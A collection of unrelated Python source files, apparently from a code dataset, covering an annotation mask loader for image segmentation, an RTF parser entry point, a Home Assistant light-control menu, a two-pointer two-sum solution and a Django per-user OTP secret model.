# log.info("Total Annotations: {}".format(total_annotation))
# log.info("Total Classes: {}".format(total_classes))
# log.info("-------")
return total_img, total_annotation, total_classes
def load_mask(self, image_id, datacfg=None, config=None):
"""Load instance masks for the given image.
Different datasets use different ways to store masks. This
function converts the different mask format to one format
in the form of a bitmap [height, width, instances].
Returns:
masks: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance masks.
"""
# log.debug("---------------------------->")
# log.debug("datacfg:{}".format(datacfg))
info = self.image_info[image_id]
# log.info("Info: {}".format(info))
name = datacfg.name if datacfg and datacfg.name else None
# log.debug("info: {}".format(info))
## route to proper load_mask_<annon_type>
##------------------------------------------
annon_type = ''
if "annon_type" in info:
annon_type = info["annon_type"]
elif "source" in info:
## coco has source key used to route to proper load_mask function
annon_type = info["source"]
fname = 'load_mask_'+annon_type
ds_source = info["source"]
# log.info("load_mask::fname: {}".format(fname))
## Testing for proper routing, uncomment print statement to debug unknown source and image mapping
# log.info("-------")
# log.info("load_mask::name, annon_type, fname, ds_source: {}, {}, {}, {}".format(name, annon_type, fname, ds_source))
# If not a self.name image, delegate to parent class.
##---------------------------------------------------
# log.debug("ds_source != name, ds_source, name: {}, {}, {}".format(ds_source != name, ds_source, name))
if ds_source != name:
return super(self.__class__, self).load_mask(image_id)
# if datacfg and 'NAME' in datacfg:
# if ds_source != datacfg.name:
# return super(self.__class__, self).load_mask(image_id)
# else:
# if ds_source != name:
# return super(self.__class__, self).load_mask(image_id)
fn = getattr(self, fname)
## TBD: raise unknown error
if fn:
return fn(image_id, info, datacfg, config)
else:
log.info("Unknown fn: {}".format(fname))
return
def load_mask_coco(self, image_id, info, datacfg=None, config=None):
# log.info("AnnonDataset::load_mask_coco")
cocodataset = self.cocodataset
return cocodataset.load_mask(image_id, datacfg)
def load_mask_via(self, image_id, info, datacfg=None, config=None):
# log.info("AnnonDataset::load_mask_via")
annotations = info["annotations"]
attributes = info["attributes"]
name = datacfg.name
# log.info("name: {}".format(name))
instance_masks = []
class_ids = []
class_labels = []
# class_ids = datacfg.classes
# log.info("debug------------------------")
# log.info("len(annotations): {}".format(len(annotations)))
# log.info("len(attributes): {}".format(len(attributes)))
# log.info("annotations: {}".format(annotations))
# log.info("attributes: {}".format(attributes))
# log.info("datacfg.classes: {}".format(datacfg.classes))
# log.info("self:...{},{},{}".format(self.class_ids, self.class_names, self.num_classes))
# log.info("classinfo:...{}".format(self.classinfo))
# log.info("classname_from_source_map:...{}".format(self.classname_from_source_map))
# log.info("classname_from_sourcename_map:...{}".format(self.classname_from_sourcename_map))
mask = np.zeros([info["height"], info["width"], len(annotations)], dtype=np.uint8)
# mask = np.zeros([info["height"], info["width"]], dtype=np.uint8)
for i, ann in enumerate(annotations):
# Get indexes of pixels inside the polygon and set them to 1
# rr, cc = skimage.draw.polygon(ann['all_points_y'], ann['all_points_x'])
lbl_id = attributes[i]['lbl_id']
# log.info("lbl_id: {}".format(lbl_id))
ct_class_id = self.get_classid_from_source_class_name( name+".{}".format(lbl_id) )
# log.info("ct_class_id: {}".format(ct_class_id))
class_id = self.classinfo[ct_class_id]['id']
# log.info("class_id: {}".format(class_id))
class_label = self.get_classname_from_source_class_id( name+".{}".format(class_id) )
# log.info("class_label: {}".format(class_label))
# log.info("lbl_id, lbl_name: {}, {}".format(class_id, class_label))
assert lbl_id == class_label
if class_id:
class_ids.append(ct_class_id)
if class_label:
class_labels.append(class_label)
rr, cc = self.ann_to_geometry_via(ann)
# log.info("mask.shape, min(mask),max(mask): {}, {},{}".format(mask.shape, np.min(mask),np.max(mask)))
# log.info("rr.shape, min(rr),max(rr): {}, {},{}".format(rr.shape, np.min(rr),np.max(rr)))
# log.info("cc.shape, min(cc),max(cc): {}, {},{}".format(cc.shape, np.min(cc),np.max(cc)))
## Note that this modifies the existing array arr, instead of creating a result array
## Ref: https://stackoverflow.com/questions/19666626/replace-all-elements-of-python-numpy-array-that-are-greater-than-some-value
rr[rr > mask.shape[0]-1] = mask.shape[0]-1
cc[cc > mask.shape[1]-1] = mask.shape[1]-1
# log.info("After fixing the dirt mask, new values:")
# log.info("rr.shape, min(rr),max(rr): {}, {},{}".format(rr.shape, np.min(rr),np.max(rr)))
# log.info("cc.shape, min(cc),max(cc): {}, {},{}".format(cc.shape, np.min(cc),np.max(cc)))
mask[rr, cc, i] = 1
keys = ['image_name', 'image_id', 'image_source', 'class_ids', 'class_labels']
values = [self.image_info[image_id]['id'], image_id, self.image_info[image_id]['source'], class_ids, class_labels]
if class_ids:
# mask = np.stack(instance_masks, axis=2).astype(np.bool)
class_ids = np.array(class_ids, dtype=np.int32)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID only, we return an array of 1s
# return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32), keys, values
return mask.astype(np.bool), class_ids, keys, values
def load_mask_labelImg(self, image_id, info, datacfg=None, config=None):
# log.info("AnnonDataset::load_mask_labelImg")
name = datacfg.name
annotations = info["annotations"]
attributes = info["attributes"]
class_ids = []
class_labels = []
# log.info("debug------------------------")
# log.info("len(annotations): {}".format(len(annotations)))
# log.info("len(attributes): {}".format(len(attributes)))
# log.info("annotations: {}".format(annotations))
# log.info("attributes: {}".format(attributes))
# log.info("-------------")
# log.info("source_class_ids: {}".format(self.source_class_ids))
# log.info("-------------")
# log.info("class_ids, class_names, num_classes: {},{},{}".format(self.class_ids, self.class_names, self.num_classes))
# log.info("-------------")
# log.info("classinfo: {}".format(self.classinfo))
# log.info("-------------")
# log.info("classname_from_source_map: {}".format(self.classname_from_source_map))
# log.info("-------------")
# log.info("classname_from_sourcename_map: {}".format(self.classname_from_sourcename_map))
# log.info("-------------")
# all_class_ids = self.source_class_ids[name]
# log.info("all_class_ids: {}".format(all_class_ids))
# mask = np.zeros([info["height"]+1, info["width"]+1, len(annotations)], dtype=np.uint8)
# Build mask of shape [height, width, len(annotations)] and list
# of class IDs that correspond to each channel of the mask.
mask = np.zeros([info["height"], info["width"], 1], dtype=np.uint8)
lbl_id = attributes['lbl_id']
# log.info("lbl_id: {}".format(lbl_id))
ct_class_id = self.get_classid_from_source_class_name("{}.{}".format(name, lbl_id) )
# log.info("ct_class_id: {}".format(ct_class_id))
class_id = self.classinfo[ct_class_id]['id']
# log.info("class_id: {}".format(class_id))
class_label = self.get_classname_from_source_class_id("{}.{}".format(name, class_id) )
# log.info("class_label: {}".format(class_label))
# log.info("lbl_id, lbl_name: {}, {}".format(class_id, class_label))
assert lbl_id == class_label
if class_label:
class_labels.append(class_label)
if class_id:
class_ids.append(ct_class_id)
# log.info("mask.shape, min(mask),max(mask): {}, {},{}".format(mask.shape, np.min(mask),np.max(mask)))
# Get indexes of pixels inside the bbox and set them to 1
rr, cc = self.ann_to_geometry_labelImg(annotations)
## Note that this modifies the existing array arr, instead of creating a result array
## Ref: https://stackoverflow.com/questions/19666626/replace-all-elements-of-python-numpy-array-that-are-greater-than-some-value
rr[rr > mask.shape[0]-1] = mask.shape[0]-1
cc[cc > mask.shape[1]-1] = mask.shape[1]-1
# log.info("After fixing the dirt mask, new values:")
# log.info("rr.shape, min(rr),max(rr): {}, {},{}".format(rr.shape, np.min(rr),np.max(rr)))
# log.info("cc.shape, min(cc),max(cc): {}, {},{}".format(cc.shape, np.min(cc),np.max(cc)))
mask[rr, cc, 0] = 1
keys = ['image_name', 'image_id', 'image_source', 'class_ids', 'class_labels']
values = [self.image_info[image_id]['id'], image_id, self.image_info[image_id]['source'], class_ids, class_labels]
if class_ids:
# mask = np.stack(instance_masks, axis=2).astype(np.bool)
class_ids = np.array(class_ids, dtype=np.int32)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID only, we return an array of 1s
# return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32), keys, values
## Return mask, and array of class IDs of each instance
# return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32), keys, values
return mask.astype(np.bool), class_ids, keys, values
def load_mask_hmd(self, image_id, info, datacfg=None, config=None):
# log.info("AnnonDataset::load_mask_hmd")
annotations = info["annotations"]
name = datacfg.name
instance_masks = []
class_ids = []
class_labels = []
# Build mask of shape [height, width, len(info["annotations"])] and list
# of class IDs that correspond to each channel of the mask.
for annotation in annotations:
lbl_id = annotation['lbl_id']
# log.debug("lbl_id: {}".format(lbl_id))
ct_class_id = self.get_classid_from_source_class_name( "{}.{}".format(name, lbl_id) )
# log.info("ct_class_id: {}".format(ct_class_id))
class_id = self.classinfo[ct_class_id]['id']
# log.info("class_id: {}".format(class_id))
class_label = self.get_classname_from_source_class_id( "{}.{}".format(name, class_id) )
# log.info("class_label: {}".format(class_label))
# log.info("lbl_id, lbl_name: {}, {}".format(class_id, class_label))
assert lbl_id == class_label
if class_label:
class_labels.append(class_label)
if class_id:
m = self.ann_to_mask_via(annotation["shape_attributes"], info["height"], info["width"])
# Some objects are so small that they're less than 1 pixel area
# and end up rounded out. Skip those objects.
if m is not None and m.max() < 1:
continue
# # Is it a crowd? If so, use a negative class ID.
# if annotation['iscrowd']:
# # Use negative class ID for crowds
# class_id *= -1
# # For crowd masks, ann_to_mask_via() sometimes returns a mask
# # smaller than the given dimensions. If so, resize it.
# if m.shape[0] != info["height"] or m.shape[1] != info["width"]:
# m = np.ones([info["height"], info["width"]], dtype=bool)
instance_masks.append(m)
class_ids.append(ct_class_id)
# Pack instance masks into an array
if class_ids:
mask = np.stack(instance_masks, axis=2).astype(np.bool)
keys = ['image_name', 'image_id', 'image_source', 'class_ids', 'class_labels']
values = [self.image_info[image_id]['id'], image_id, self.image_info[image_id]['source'], class_ids, class_labels]
class_ids = np.array(class_ids, dtype=np.int32)
return mask, class_ids, keys, values
else:
# Call super class to return an empty mask
return super(self.__class__, self).load_mask(image_id)
def ann_to_geometry_labelImg(self, ann):
"""
Load Different Geometry types specific to labelImg tool
Ref: http://scikit-image.org/docs/0.8.0/api/skimage.draw.html
"""
# log.info("AnnonDataset::ann_to_geometry_labelImg")
start = (ann[0], ann[1])
extent = (ann[2], ann[3])
# log.info("start, extent: {} {}".format(start, extent))
rr, cc = skimage.draw.rectangle(start, extent=extent)
# log.info("rr.shape, min(rr),max(rr): {}, {},{}".format(rr.shape, np.min(rr),np.max(rr)))
# log.info("cc.shape, min(cc),max(cc): {}, {},{}".format(cc.shape, np.min(cc),np.max(cc)))
return rr, cc
def polyline2coords(self, points):
"""
## Ref:
https://www.programcreek.com/python/example/94226/skimage.draw.line
Return row and column coordinates for a polyline.
>>> rr, cc = polyline2coords([(0, 0), (2, 2), (2, 4)])
>>> list(rr)
[0, 1, 2, 2, 3, 4]
>>> list(cc)
[0, 1, 2, 2, 2, 2]
:param list of tuple points: Polyline in format [(x1,y1), (x2,y2), ...]
:return: tuple with row and column coordinates in numpy arrays
:rtype: tuple of numpy array
"""
coords = []
for i in range(len(points) - 1):
xy = list(map(int, points[i] + points[i + 1]))
coords.append(skimage.draw.line(xy[1], xy[0], xy[3], xy[2]))
return [np.hstack(c) for c in zip(*coords)]
def ann_to_geometry_via(self, ann):
"""
Load Different Geometry types specific to via tool
Ref: http://scikit-image.org/docs/0.8.0/api/skimage.draw.html
Ref: http://scikit-image.org/docs/0.14.x/api/skimage.draw.html#skimage.draw.line
"""
# log.info("AnnonDataset::ann_to_geometry_via")
## rr, cc = 0, 0
rr = np.zeros([0, 0, len(ann)],dtype=np.uint8)
cc = np.zeros([0, 0, len(ann)],dtype=np.uint8)
if ann['name'] == 'polygon':
rr, cc = skimage.draw.polygon(ann['all_points_y'], ann['all_points_x'])
elif ann['name'] == 'rect':
## x, y, width, height
## quck patch for old data having KeyError: missing 'y' or 'x'
## TODO: Error logging
for attr in ['x','y','width','height']:
if attr not in ann:
return rr,cc
# start = (ann['x'], ann['y'])
# extent = (ann['width'], ann['height'])
start = (ann['y'], ann['x'])
extent = (ann['height'], ann['width'])
# log.info("start, extent: {} {}".format(start, extent))
rr, cc = skimage.draw.rectangle(start, extent=extent)
elif ann['name'] == 'circle':
rr, cc = skimage.draw.circle(ann['cy'], ann['cx'],ann['r'])
elif ann['name'] == 'ellipse':
rr, cc = skimage.draw.ellipse(ann['cy'], ann['cx'],ann['ry'],ann['rx'])
elif ann['name'] == 'polyline':
points = list(zip(ann['all_points_x'],ann['all_points_y']))
rr,cc = self.polyline2coords(points)
else:
## TBD: raise error
log.info("Annotation Geometry Not Yet Supported")
log.info("ann_to_mask_via: ann['name']: {}".format(ann['name']))
# log.info("rr.shape, min(rr),max(rr): {}, {},{}".format(rr.shape, np.min(rr),np.max(rr)))
# log.info("cc.shape, min(cc),max(cc): {}, {},{}".format(cc.shape, np.min(cc),np.max(cc)))
return rr,cc
def ann_to_mask_via(self, ann, height, width):
"""
Convert geometries specific to via tool to mask
:return: binary mask (numpy 2D array)
"""
# log.info("AnnonDataset::ann_to_mask_via")
# mask = np.zeros([height, width, len(ann)],dtype=np.uint8)
mask = np.zeros([height, width],dtype=np.uint8)
rr, cc = self.ann_to_geometry_via(ann)
if rr is not None and cc is not None:
# log.info("mask.shape, min(mask),max(mask): {}, {},{}".format(mask.shape, np.min(mask),np.max(mask)))
# log.info("rr.shape, min(rr),max(rr): {}, {},{}".format(rr.shape, np.min(rr),np.max(rr)))
# log.info("cc.shape, min(cc),max(cc): {}, {},{}".format(cc.shape, np.min(cc),np.max(cc)))
## Note that this modifies the existing array arr, instead of creating a result array
## Ref: https://stackoverflow.com/questions/19666626/replace-all-elements-of-python-numpy-array-that-are-greater-than-some-value
rr[rr > mask.shape[0]-1] = mask.shape[0]-1
cc[cc > mask.shape[1]-1] = mask.shape[1]-1
# log.info("After fixing the dirt mask, new values:")
# log.info("rr.shape, min(rr),max(rr): {}, {},{}".format(rr.shape, np.min(rr),np.max(rr)))
# log.info("cc.shape, min(cc),max(cc): {}, {},{}".format(cc.shape, np.min(cc),np.max(cc)))
mask[rr, cc] = 1
# Return mask
return mask.astype(np.bool)
def image_reference(self, image_id, info=None, datacfg=None):
# log.info("AnnonDataset::image_reference")
"""Return the path of the image."""
info = info if info else self.image_info[image_id]
name = datacfg.name if datacfg and datacfg.name else self.name
if info["source"] == name:
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
|
#!/usr/bin/env python
import sys
from rtfparse import version
from rtfparse import entry
def rtfparse():
sys.exit(entry.cli_start(version.version))
if __name__ == "__main__":
rtfparse()
|
#!/usr/local/bin/python3
from whiptail import Whiptail
import requests
import json
endpoint = "http://YOURIP/api/"
hass = {
"Authorization": "Bearer YOURTOKEN",
"Content-Type": "application/json"
}
devices = {
'NAME1': ['DEVICEID','light',3],
'NAME2': ['DEVICEID','light',3],
'NAME3': ['DEVICEID','light',3]
}
def setStatus(device):
d = "services/"+device[1]+"/"
if w.confirm('SWITCH ON ?'):
d += "turn_on"
else:
d += "turn_off"
print(requests.post(endpoint+d, headers=hass, data=json.dumps({'entity_id':device[0]})).text)
def setBrightness(device):
d = "services/"+device[1]+"/turn_on"
br = round(int(w.menu('SET BRIGHTNESS', ('0', '10', '20', '30', '40', '50', '60', '70', '80', '90', '100')).decode())/100*255)
print(requests.post(endpoint+d, headers=hass, data=json.dumps({'entity_id':device[0], 'brightness': br})).text)
def setColor(device):
d = "services/"+device[1]+"/turn_on"
c = w.menu('SET COLOR', ('WHITE', 'RED', 'ORANGE', 'YELLOW', 'GREEN', 'LIME', 'CYAN', 'BLUE', 'MAGENTA', 'PURPLE')).decode()
if c == 'WHITE':
print(requests.post(endpoint+d, headers=hass, data=json.dumps({'entity_id':device[0], 'white_value': 255, 'color_temp': 288})).text)
else:
print(requests.post(endpoint+d, headers=hass, data=json.dumps({'entity_id':device[0], 'color_name':c})).text)
def chooseAction(device):
if device[2] == 2:
menu = ('STATUS', 'BRIGHTNESS')
elif device[2] == 3:
menu = ('STATUS', 'BRIGHTNESS', 'COLOR')
ret = w.menu('CHOOSE ACTION', menu).decode()
if ret == 'STATUS':
setStatus(device)
elif ret == 'BRIGHTNESS':
setBrightness(device)
elif ret == 'COLOR':
setColor(device)
w = Whiptail()
dat = []
for d in devices.keys():
dat.append(d)
dat.append("EXIT")
dat = tuple(dat)
ret = ''
while True:
ret = w.menu('LIGHTS', dat).decode()
if ret == 'EXIT':
break
dev = devices[ret]
if dev[2] == 1:
setStatus(dev)
elif dev[2] > 1:
chooseAction(dev)
|
# -*- coding: utf-8 -*-
# @Author: ไฝ็ฟ
# @Create Date: 2019-01-16 15:49:20
# @Last Modified by: ไฝ็ฟ
# @Last Modified time: 2019-01-16 15:53:13
class Solution:
def twoSum(self, numbers, target):
"""
:type numbers: List[int]
:type target: int
:rtype: List[int]
"""
left, right = 0, len(numbers) - 1
while left < right:
_sum = numbers[left] + numbers[right]
if _sum > target:
right -= 1
elif _sum < target:
left += 1
else:
return [left + 1, right + 1]
|
from django.conf import settings
from django.db import models
import pyotp
class UserPSK(models.Model):
"""Strores custom secret key per user"""
user = models.OneToOneField(settings.AUTH_USER_MODEL, related_name='psk', on_delete=models.CASCADE)
secret_key = models.CharField(max_length=16, default=pyotp.random_base32)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.